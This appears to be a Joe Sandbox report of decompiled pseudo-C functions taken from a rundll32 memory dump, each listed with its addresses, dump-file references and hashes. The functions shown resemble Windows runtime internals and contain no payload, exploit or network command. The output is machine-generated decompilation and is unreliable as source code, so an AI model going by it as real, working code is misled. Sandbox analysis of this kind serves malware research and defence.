                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044437F5 Relevance: .1, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E044437F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04422280(_t6, 0x44f8550);
				}
				_t29 = E0444387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0441FFB0(0x44f8550, _t27, 0x44f8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                                                                0x044437fa
                                                                                                                0x044437fc
                                                                                                                0x04443805
                                                                                                                0x04443808
                                                                                                                0x04443808
                                                                                                                0x04443814
                                                                                                                0x04443818
                                                                                                                0x04443846
                                                                                                                0x04443848
                                                                                                                0x0444384b
                                                                                                                0x0444384b
                                                                                                                0x04443852
                                                                                                                0x00000000
                                                                                                                0x04443854
                                                                                                                0x04443856
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04443863
                                                                                                                0x00000000
                                                                                                                0x04443863
                                                                                                                0x0444381a
                                                                                                                0x0444381a
                                                                                                                0x0444381f
                                                                                                                0x0444386e
                                                                                                                0x0444386e
                                                                                                                0x04443871
                                                                                                                0x04443873
                                                                                                                0x04443873
                                                                                                                0x04443868
                                                                                                                0x00000000
                                                                                                                0x04443868
                                                                                                                0x04443821
                                                                                                                0x04443826
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04443828
                                                                                                                0x0444382a
                                                                                                                0x04443841
                                                                                                                0x00000000
                                                                                                                0x04443841

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9823f370f3a70b9edc1a894f4aa6d80f2a395ff658006722c59c36d3145d2a86
                                                                                                                • Instruction ID: bf240162e49331c83f321758bec58f0f3cb778c3022ce53137dcb8f0c440df58
                                                                                                                • Opcode Fuzzy Hash: 9823f370f3a70b9edc1a894f4aa6d80f2a395ff658006722c59c36d3145d2a86
                                                                                                                • Instruction Fuzzy Hash: 7501A172B01A109BEB368F1A9940A2BFBE6DBC5E74715446FED498B311D734F801C690
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0440C962 Relevance: .1, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 42%
                                                                                                                			E0440C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x44fd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0441EEF0(0x44f70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0448F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0441EB70(_t29, 0x44f70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0444B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0448F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x44f70c0; // 0x0
					while(_t38 != 0x44f70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x44fb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                                                                0x0440c96a
                                                                                                                0x0440c974
                                                                                                                0x0440c988
                                                                                                                0x0440c98a
                                                                                                                0x04477c9d
                                                                                                                0x04477c9f
                                                                                                                0x04477ca4
                                                                                                                0x04477cae
                                                                                                                0x04477cf0
                                                                                                                0x04477cf5
                                                                                                                0x04477cfa
                                                                                                                0x0440c992
                                                                                                                0x0440c996
                                                                                                                0x0440c997
                                                                                                                0x0440c998
                                                                                                                0x0440c9a3
                                                                                                                0x0440c9a3
                                                                                                                0x04477cb0
                                                                                                                0x04477cb7
                                                                                                                0x04477cbb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477cbd
                                                                                                                0x04477ce8
                                                                                                                0x04477cc5
                                                                                                                0x04477cc8
                                                                                                                0x04477cca
                                                                                                                0x04477cd0
                                                                                                                0x04477cd6
                                                                                                                0x04477cde
                                                                                                                0x04477ce4
                                                                                                                0x04477ce4
                                                                                                                0x04477cd0
                                                                                                                0x00000000
                                                                                                                0x04477ce8
                                                                                                                0x0440c990
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a6ab4488d54badaadb3c134e556adbb98da8bd35963e620948ec5066cb3fc5aa
                                                                                                                • Instruction ID: 1cbcf8bf1fc92dfba41804efd42bdce2bc4bc906ed9040daa19050545342785c
                                                                                                                • Opcode Fuzzy Hash: a6ab4488d54badaadb3c134e556adbb98da8bd35963e620948ec5066cb3fc5aa
                                                                                                                • Instruction Fuzzy Hash: 3911A0327006469FEF10AE69CD8596B7BE5FF88614B50053EED4283651DB24FC15CBD1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0443002D Relevance: .1, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0443002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04427D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04427D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04427D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04427D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                                                                0x04430032
                                                                                                                0x04430037
                                                                                                                0x04430043
                                                                                                                0x04474b3a
                                                                                                                0x04430049
                                                                                                                0x04430049
                                                                                                                0x04430049
                                                                                                                0x0443004e
                                                                                                                0x04430053
                                                                                                                0x04474b48
                                                                                                                0x04474b5a
                                                                                                                0x04474b4a
                                                                                                                0x04474b53
                                                                                                                0x04474b53
                                                                                                                0x04474b5f
                                                                                                                0x00000000
                                                                                                                0x04474b61
                                                                                                                0x00000000
                                                                                                                0x04474b61
                                                                                                                0x04430059
                                                                                                                0x04430059
                                                                                                                0x04430060
                                                                                                                0x04474b6f
                                                                                                                0x04474b6f
                                                                                                                0x04430069
                                                                                                                0x04474b83
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04474b90
                                                                                                                0x04474b9b
                                                                                                                0x04474b9b
                                                                                                                0x04474ba4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04474baa
                                                                                                                0x00000000
                                                                                                                0x0443006f
                                                                                                                0x0443006f
                                                                                                                0x00000000
                                                                                                                0x0443006f
                                                                                                                0x04430069

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                                • Instruction ID: d4991f19c940d8b1fe116015943daf3aaa33569b28cad65ecaf301adf50bbe50
                                                                                                                • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                                • Instruction Fuzzy Hash: BC11E1327056808FEF228B29DA44B7677A4EB45B98F0900A3DD0497792E328FC42C660
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0441766D Relevance: .1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E0441766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0443F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0443F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04424620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                                                                0x04417672
                                                                                                                0x0441767f
                                                                                                                0x04417689
                                                                                                                0x044176de
                                                                                                                0x044176de
                                                                                                                0x0441768b
                                                                                                                0x04417691
                                                                                                                0x04417693
                                                                                                                0x04417697
                                                                                                                0x00000000
                                                                                                                0x04417699
                                                                                                                0x044176a8
                                                                                                                0x00000000
                                                                                                                0x044176aa
                                                                                                                0x044176ad
                                                                                                                0x044176b1
                                                                                                                0x00000000
                                                                                                                0x044176b3
                                                                                                                0x044176b3
                                                                                                                0x044176b5
                                                                                                                0x044176ba
                                                                                                                0x044176bc
                                                                                                                0x044176bc
                                                                                                                0x044176c0
                                                                                                                0x00000000
                                                                                                                0x044176c2
                                                                                                                0x044176ce
                                                                                                                0x044176ce
                                                                                                                0x044176c0
                                                                                                                0x044176b1
                                                                                                                0x044176a8
                                                                                                                0x04417697
                                                                                                                0x044176d9

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                • Instruction ID: d308aa2de44150be46237120acd8db87b237ff71b5fa2ccd61a63cb21ae855cc
                                                                                                                • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                • Instruction Fuzzy Hash: 0F018432700119AFDB20EE5ECD45E5B77ADEB88B70B24452AB948CB264DA30ED0187A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0449C450 Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 46%
                                                                                                                			E0449C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04449910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E044495B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E044495D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E044495D0();
				return L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                                                                0x0449c458
                                                                                                                0x0449c45d
                                                                                                                0x0449c466
                                                                                                                0x0449c468
                                                                                                                0x0449c469
                                                                                                                0x0449c46a
                                                                                                                0x0449c46b
                                                                                                                0x0449c46e
                                                                                                                0x0449c46f
                                                                                                                0x0449c471
                                                                                                                0x0449c476
                                                                                                                0x0449c476
                                                                                                                0x0449c47c
                                                                                                                0x0449c47e
                                                                                                                0x0449c480
                                                                                                                0x0449c480
                                                                                                                0x0449c483
                                                                                                                0x0449c484
                                                                                                                0x0449c486
                                                                                                                0x0449c488
                                                                                                                0x0449c48f
                                                                                                                0x0449c491
                                                                                                                0x0449c493
                                                                                                                0x0449c493
                                                                                                                0x0449c48f
                                                                                                                0x0449c498
                                                                                                                0x0449c49e
                                                                                                                0x0449c4ad
                                                                                                                0x0449c4ad
                                                                                                                0x0449c4b2
                                                                                                                0x0449c4b4
                                                                                                                0x0449c4cd

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                                • Instruction ID: 399dab492659956fa2570bb4c90e0641f17da804cd0a3fb2032949ec2e8fc494
                                                                                                                • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                                • Instruction Fuzzy Hash: F50180B2240505BFFE21AF66CC81E63BB6DFB94794F10452AF11442661CB31BCA0DAA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04409080 Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 69%
                                                                                                                			E04409080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x44f85ec;
				E04422280(_t48, 0x44f85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0441FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x44f538c; // 0x36b1e0
					if( *_t84 != 0x44f5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x44df6e8);
						E0445D0E8(0x44f85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E044D88F5(_t80, _t85, 0x44f5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x44f86c0; // 0x3507b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x44f86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04422280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E044D88F5(0x44f85ec, _t85, 0x44f5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0444AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x44fb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x44f84c0;
																			if(_t82 >=  *0x44f84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E044D9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0440922A(_t99);
										_t64 = E04427D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E044D8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x44f86c0; // 0x3507b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x44f86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x44f86bc;
													_t87 = 0x44f86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04409240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x44f86c4;
												_t87 = 0x44f86c0;
												L27:
												E04439B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0445D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x44f5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x44f538c = _t51;
						goto L6;
					}
				}
			}




















                                                                                                                0x04409082
                                                                                                                0x04409083
                                                                                                                0x04409084
                                                                                                                0x04409085
                                                                                                                0x04409087
                                                                                                                0x04409096
                                                                                                                0x04409098
                                                                                                                0x04409098
                                                                                                                0x0440909e
                                                                                                                0x044090a8
                                                                                                                0x044090e7
                                                                                                                0x044090e7
                                                                                                                0x044090aa
                                                                                                                0x044090b0
                                                                                                                0x044090b7
                                                                                                                0x044090bd
                                                                                                                0x044090dd
                                                                                                                0x044090e6
                                                                                                                0x044090bf
                                                                                                                0x044090bf
                                                                                                                0x044090c7
                                                                                                                0x044090cf
                                                                                                                0x044090f1
                                                                                                                0x044090f2
                                                                                                                0x044090f4
                                                                                                                0x044090f5
                                                                                                                0x044090f6
                                                                                                                0x044090f7
                                                                                                                0x044090f8
                                                                                                                0x044090f9
                                                                                                                0x044090fa
                                                                                                                0x044090fb
                                                                                                                0x044090fc
                                                                                                                0x044090fd
                                                                                                                0x044090fe
                                                                                                                0x044090ff
                                                                                                                0x04409100
                                                                                                                0x04409102
                                                                                                                0x04409107
                                                                                                                0x0440910c
                                                                                                                0x04409110
                                                                                                                0x04409113
                                                                                                                0x04409115
                                                                                                                0x04409136
                                                                                                                0x0440913f
                                                                                                                0x04409143
                                                                                                                0x044637e4
                                                                                                                0x044637e4
                                                                                                                0x04409117
                                                                                                                0x04409117
                                                                                                                0x0440911d
                                                                                                                0x00000000
                                                                                                                0x0440911f
                                                                                                                0x0440911f
                                                                                                                0x04409125
                                                                                                                0x00000000
                                                                                                                0x04409127
                                                                                                                0x0440912d
                                                                                                                0x04409130
                                                                                                                0x04409134
                                                                                                                0x04409158
                                                                                                                0x0440915d
                                                                                                                0x04409161
                                                                                                                0x04409168
                                                                                                                0x04463715
                                                                                                                0x0440916e
                                                                                                                0x0440916e
                                                                                                                0x04409175
                                                                                                                0x04409177
                                                                                                                0x0440917e
                                                                                                                0x0440917f
                                                                                                                0x04409182
                                                                                                                0x04409182
                                                                                                                0x04409187
                                                                                                                0x04409187
                                                                                                                0x0440918a
                                                                                                                0x0440918d
                                                                                                                0x0440918f
                                                                                                                0x04409192
                                                                                                                0x04409195
                                                                                                                0x04409198
                                                                                                                0x04409198
                                                                                                                0x04409198
                                                                                                                0x0440919a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0446371f
                                                                                                                0x04463721
                                                                                                                0x04463727
                                                                                                                0x0446372f
                                                                                                                0x04463733
                                                                                                                0x04463735
                                                                                                                0x04463738
                                                                                                                0x0446373b
                                                                                                                0x0446373d
                                                                                                                0x04463740
                                                                                                                0x00000000
                                                                                                                0x04463746
                                                                                                                0x04463746
                                                                                                                0x04463749
                                                                                                                0x00000000
                                                                                                                0x0446374f
                                                                                                                0x0446374f
                                                                                                                0x04463751
                                                                                                                0x04463757
                                                                                                                0x04463759
                                                                                                                0x0446375c
                                                                                                                0x0446375c
                                                                                                                0x0446375e
                                                                                                                0x0446375e
                                                                                                                0x04463761
                                                                                                                0x04463764
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04463766
                                                                                                                0x04463768
                                                                                                                0x044637a3
                                                                                                                0x044637a3
                                                                                                                0x044637a5
                                                                                                                0x044637a7
                                                                                                                0x044637ad
                                                                                                                0x044637b0
                                                                                                                0x044637b2
                                                                                                                0x044637bc
                                                                                                                0x044637c2
                                                                                                                0x044637c2
                                                                                                                0x044637b2
                                                                                                                0x04409187
                                                                                                                0x04409187
                                                                                                                0x0440918a
                                                                                                                0x0440918d
                                                                                                                0x0440918f
                                                                                                                0x04409192
                                                                                                                0x04409195
                                                                                                                0x00000000
                                                                                                                0x04409195
                                                                                                                0x00000000
                                                                                                                0x0446376a
                                                                                                                0x0446376a
                                                                                                                0x0446376a
                                                                                                                0x0446376c
                                                                                                                0x0446376c
                                                                                                                0x0446376f
                                                                                                                0x04463775
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04463777
                                                                                                                0x04463779
                                                                                                                0x04463782
                                                                                                                0x04463787
                                                                                                                0x04463789
                                                                                                                0x04463790
                                                                                                                0x04463790
                                                                                                                0x0446378b
                                                                                                                0x0446378b
                                                                                                                0x0446378b
                                                                                                                0x04463792
                                                                                                                0x04463795
                                                                                                                0x00000000
                                                                                                                0x04463795
                                                                                                                0x00000000
                                                                                                                0x04463779
                                                                                                                0x04463798
                                                                                                                0x00000000
                                                                                                                0x04463798
                                                                                                                0x00000000
                                                                                                                0x04463768
                                                                                                                0x0446379b
                                                                                                                0x0446379b
                                                                                                                0x04463751
                                                                                                                0x04463749
                                                                                                                0x00000000
                                                                                                                0x04463740
                                                                                                                0x044091a0
                                                                                                                0x044091a3
                                                                                                                0x044091a9
                                                                                                                0x044091b0
                                                                                                                0x00000000
                                                                                                                0x044091b0
                                                                                                                0x04409187
                                                                                                                0x044091b4
                                                                                                                0x044091b4
                                                                                                                0x044091bb
                                                                                                                0x044091c0
                                                                                                                0x044091c5
                                                                                                                0x044091c7
                                                                                                                0x044637da
                                                                                                                0x044091cd
                                                                                                                0x044091cd
                                                                                                                0x044091cd
                                                                                                                0x044091d2
